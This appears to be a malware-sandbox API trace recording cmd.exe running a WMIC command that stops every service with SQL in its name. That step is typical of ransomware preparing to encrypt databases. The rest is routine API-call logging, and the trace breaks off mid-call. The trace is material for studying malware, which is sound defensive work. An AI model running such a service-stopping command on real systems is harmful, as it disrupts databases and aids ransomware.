= 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1714 start_va = 0x4fc0000 end_va = 0x50bffff entry_point = 0x0 region_type = private name = "private_0x0000000004fc0000" filename = "" Region: id = 1715 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1756 start_va = 0x4b20000 end_va = 0x4b2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b20000" filename = "" Region: id = 1757 start_va = 0x4ce0000 end_va = 0x4d9dfff entry_point = 0x4ce0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1758 start_va = 0x4da0000 end_va = 0x4ddffff entry_point = 0x0 region_type = private name = "private_0x0000000004da0000" filename = "" Region: id = 1759 start_va = 0x4e80000 end_va = 0x4f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e80000" filename = "" Region: id = 1760 start_va = 0x51e0000 end_va = 0x51effff entry_point = 0x0 region_type = private name = "private_0x00000000051e0000" filename = "" Region: id = 1761 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1762 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1763 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1764 start_va = 0x7eae0000 end_va = 0x7ebdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eae0000" filename = "" Region: id = 1765 start_va = 0x7ec0a000 end_va = 0x7ec0cfff entry_point = 0x0 region_type = private name = "private_0x000000007ec0a000" filename = "" Region: id = 1766 start_va = 0x4b30000 end_va = 0x4b33fff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 1767 start_va = 0x4b40000 end_va = 0x4b43fff entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 1768 start_va = 0x51f0000 end_va = 0x5526fff entry_point = 0x51f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 142 os_tid = 0xc70 [0104.576] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0104.576] __set_app_type (_Type=0x1) [0104.576] __p__fmode () returned 0x77ac4d6c [0104.576] __p__commode () returned 0x77ac5b1c [0104.576] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0104.576] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0104.576] GetCurrentThreadId () returned 0xc70 [0104.576] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc70) returned 0x84 [0104.576] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0104.576] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0104.576] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.578] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0104.579] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4cafdbc | out: phkResult=0x4cafdbc*=0x0) returned 0x2 [0104.579] VirtualQuery (in: lpAddress=0x4cafdc3, lpBuffer=0x4cafd74, dwLength=0x1c | out: lpBuffer=0x4cafd74*(BaseAddress=0x4caf000, AllocationBase=0x4bb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0104.579] VirtualQuery (in: lpAddress=0x4bb0000, lpBuffer=0x4cafd74, dwLength=0x1c | out: lpBuffer=0x4cafd74*(BaseAddress=0x4bb0000, AllocationBase=0x4bb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0104.579] VirtualQuery (in: lpAddress=0x4bb1000, lpBuffer=0x4cafd74, dwLength=0x1c | out: lpBuffer=0x4cafd74*(BaseAddress=0x4bb1000, AllocationBase=0x4bb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0104.579] VirtualQuery (in: lpAddress=0x4bb3000, lpBuffer=0x4cafd74, dwLength=0x1c | out: lpBuffer=0x4cafd74*(BaseAddress=0x4bb3000, AllocationBase=0x4bb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0104.579] VirtualQuery (in: lpAddress=0x4cb0000, lpBuffer=0x4cafd74, dwLength=0x1c | out: lpBuffer=0x4cafd74*(BaseAddress=0x4cb0000, AllocationBase=0x4cb0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0104.579] GetConsoleOutputCP () returned 0x1b5 [0104.579] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0104.579] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0104.579] _get_osfhandle (_FileHandle=1) returned 0x3c [0104.579] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0104.579] _get_osfhandle (_FileHandle=1) returned 0x3c [0104.579] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0104.580] _get_osfhandle (_FileHandle=1) returned 0x3c [0104.580] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0104.580] _get_osfhandle (_FileHandle=0) returned 0x38 [0104.580] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0104.580] _get_osfhandle (_FileHandle=0) returned 0x38 [0104.580] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0104.580] GetEnvironmentStringsW () returned 0x4fc7dc8* [0104.580] FreeEnvironmentStringsA (penv="A") returned 1 [0104.580] GetEnvironmentStringsW () returned 0x4fc7dc8* [0104.580] FreeEnvironmentStringsA (penv="A") returned 1 [0104.580] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4caed20 | out: phkResult=0x4caed20*=0x94) returned 0x0 [0104.581] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4caed24, lpData=0x4caed2c, lpcbData=0x4caed28*=0x1000 | out: lpType=0x4caed24*=0x0, lpData=0x4caed2c*=0x68, lpcbData=0x4caed28*=0x1000) returned 0x2 [0104.581] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4caed24, lpData=0x4caed2c, lpcbData=0x4caed28*=0x1000 | out: lpType=0x4caed24*=0x4, lpData=0x4caed2c*=0x1, lpcbData=0x4caed28*=0x4) returned 0x0 [0104.581] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4caed24, lpData=0x4caed2c, lpcbData=0x4caed28*=0x1000 | out: lpType=0x4caed24*=0x0, lpData=0x4caed2c*=0x1, lpcbData=0x4caed28*=0x1000) returned 0x2 [0104.581] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4caed24, lpData=0x4caed2c, lpcbData=0x4caed28*=0x1000 | out: lpType=0x4caed24*=0x4, lpData=0x4caed2c*=0x0, lpcbData=0x4caed28*=0x4) returned 0x0 [0104.581] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4caed24, lpData=0x4caed2c, lpcbData=0x4caed28*=0x1000 | out: lpType=0x4caed24*=0x4, lpData=0x4caed2c*=0x40, lpcbData=0x4caed28*=0x4) returned 0x0 [0104.581] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4caed24, lpData=0x4caed2c, lpcbData=0x4caed28*=0x1000 | out: lpType=0x4caed24*=0x4, lpData=0x4caed2c*=0x40, lpcbData=0x4caed28*=0x4) returned 0x0 [0104.581] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4caed24, lpData=0x4caed2c, lpcbData=0x4caed28*=0x1000 | out: lpType=0x4caed24*=0x0, lpData=0x4caed2c*=0x40, lpcbData=0x4caed28*=0x1000) returned 0x2 [0104.581] RegCloseKey (hKey=0x94) returned 0x0 [0104.581] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4caed20 | out: phkResult=0x4caed20*=0x94) returned 0x0 [0104.581] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4caed24, lpData=0x4caed2c, lpcbData=0x4caed28*=0x1000 | out: lpType=0x4caed24*=0x0, lpData=0x4caed2c*=0x40, lpcbData=0x4caed28*=0x1000) returned 0x2 [0104.581] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4caed24, lpData=0x4caed2c, lpcbData=0x4caed28*=0x1000 | out: lpType=0x4caed24*=0x4, lpData=0x4caed2c*=0x1, lpcbData=0x4caed28*=0x4) returned 0x0 [0104.581] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4caed24, lpData=0x4caed2c, lpcbData=0x4caed28*=0x1000 | out: lpType=0x4caed24*=0x0, lpData=0x4caed2c*=0x1, lpcbData=0x4caed28*=0x1000) returned 0x2 [0104.581] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4caed24, lpData=0x4caed2c, lpcbData=0x4caed28*=0x1000 | out: lpType=0x4caed24*=0x4, lpData=0x4caed2c*=0x0, lpcbData=0x4caed28*=0x4) returned 0x0 [0104.581] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4caed24, lpData=0x4caed2c, lpcbData=0x4caed28*=0x1000 | out: lpType=0x4caed24*=0x4, lpData=0x4caed2c*=0x9, lpcbData=0x4caed28*=0x4) returned 0x0 [0104.581] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4caed24, lpData=0x4caed2c, lpcbData=0x4caed28*=0x1000 | out: lpType=0x4caed24*=0x4, lpData=0x4caed2c*=0x9, lpcbData=0x4caed28*=0x4) returned 0x0 [0104.581] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4caed24, lpData=0x4caed2c, lpcbData=0x4caed28*=0x1000 | out: lpType=0x4caed24*=0x0, lpData=0x4caed2c*=0x9, lpcbData=0x4caed28*=0x1000) returned 0x2 [0104.581] RegCloseKey (hKey=0x94) returned 0x0 [0104.581] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29819 [0104.581] srand (_Seed=0x5ad29819) [0104.581] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE" [0104.581] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE" [0104.581] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0104.581] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4fc9d20, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0104.581] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0104.581] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0104.581] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0104.581] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0104.582] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0104.582] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0104.582] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0104.582] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0104.582] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0104.582] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0104.582] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0104.582] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0104.582] GetEnvironmentStringsW () returned 0x4fc7dc8* [0104.582] FreeEnvironmentStringsA (penv="A") returned 1 [0104.582] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0104.582] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0104.582] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0104.582] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0104.582] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0104.582] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0104.582] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0104.582] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0104.582] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0104.582] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0104.582] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4cafaf8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0104.582] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4cafaf8, lpFilePart=0x4cafaf0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4cafaf0*="Desktop") returned 0x1d [0104.582] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0104.582] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4caf878 | out: lpFindFileData=0x4caf878) returned 0x4fc05c8 [0104.582] FindClose (in: hFindFile=0x4fc05c8 | out: hFindFile=0x4fc05c8) returned 1 [0104.583] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4caf878 | out: lpFindFileData=0x4caf878) returned 0x4fc05c8 [0104.583] FindClose (in: hFindFile=0x4fc05c8 | out: hFindFile=0x4fc05c8) returned 1 [0104.583] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0104.583] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4caf878 | out: lpFindFileData=0x4caf878) returned 0x4fc05c8 [0104.583] FindClose (in: hFindFile=0x4fc05c8 | out: hFindFile=0x4fc05c8) returned 1 [0104.583] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0104.583] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0104.583] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0104.583] GetEnvironmentStringsW () returned 0x4fc7dc8* [0104.583] FreeEnvironmentStringsA (penv="=") returned 1 [0104.583] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0104.584] GetConsoleOutputCP () returned 0x1b5 [0104.584] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0104.584] GetUserDefaultLCID () returned 0x409 [0104.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0104.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4cafc28, cchData=128 | out: lpLCData="0") returned 2 [0104.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4cafc28, cchData=128 | out: lpLCData="0") returned 2 [0104.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4cafc28, cchData=128 | out: lpLCData="1") returned 2 [0104.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0104.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0104.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0104.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0104.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0104.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0104.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0104.584] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0104.584] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0104.584] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0104.584] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0104.585] GetConsoleTitleW (in: lpConsoleTitle=0x4fcaa90, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0104.585] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0104.585] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0104.585] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0104.585] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0104.586] GetEnvironmentVariableW (in: lpName="SQL", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0104.586] _wcsicmp (_String1="SQL", _String2="CD") returned 16 [0104.586] _wcsicmp (_String1="SQL", _String2="ERRORLEVEL") returned 14 [0104.586] _wcsicmp (_String1="SQL", _String2="CMDEXTVERSION") returned 16 [0104.586] _wcsicmp (_String1="SQL", _String2="CMDCMDLINE") returned 16 [0104.586] _wcsicmp (_String1="SQL", _String2="DATE") returned 15 [0104.586] _wcsicmp (_String1="SQL", _String2="TIME") returned -1 [0104.586] _wcsicmp (_String1="SQL", _String2="RANDOM") returned 1 [0104.586] _wcsicmp (_String1="SQL", _String2="HIGHESTNUMANODENUMBER") returned 11 [0104.586] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0104.586] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0104.586] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0104.586] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0104.586] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0104.586] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0104.586] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0104.587] GetConsoleTitleW (in: lpConsoleTitle=0x4caf910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0104.588] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0104.588] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0104.588] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0104.588] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0104.588] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0104.588] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0104.588] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0104.588] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0104.588] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0104.588] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0104.588] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0104.588] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0104.588] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0104.588] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0104.588] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0104.588] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0104.588] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0104.588] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0104.588] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0104.588] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0104.588] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0104.588] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0104.588] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0104.588] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0104.588] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0104.588] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0104.588] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0104.588] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0104.588] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0104.588] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0104.588] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0104.588] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0104.588] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0104.588] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0104.588] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0104.588] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0104.588] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0104.588] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0104.588] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0104.588] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0104.588] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0104.588] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0104.588] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0104.588] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0104.588] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0104.588] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0104.588] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0104.588] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0104.588] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0104.588] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0104.588] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0104.588] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0104.589] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0104.589] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0104.589] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0104.589] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0104.589] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0104.589] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0104.589] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0104.589] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0104.589] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0104.589] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0104.589] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0104.589] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0104.589] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0104.589] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0104.589] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0104.589] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0104.589] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0104.589] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0104.589] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0104.589] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0104.589] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0104.589] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0104.589] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0104.589] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0104.589] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0104.589] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0104.589] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0104.589] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0104.589] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0104.589] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0104.589] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0104.589] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0104.589] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0104.589] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0104.589] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0104.589] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0104.589] SetErrorMode (uMode=0x0) returned 0x0 [0104.590] SetErrorMode (uMode=0x1) returned 0x0 [0104.590] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4fc05d0, lpFilePart=0x4caf41c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4caf41c*="Desktop") returned 0x1d [0104.590] SetErrorMode (uMode=0x0) returned 0x1 [0104.590] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0104.590] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0104.596] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0104.597] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.597] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, 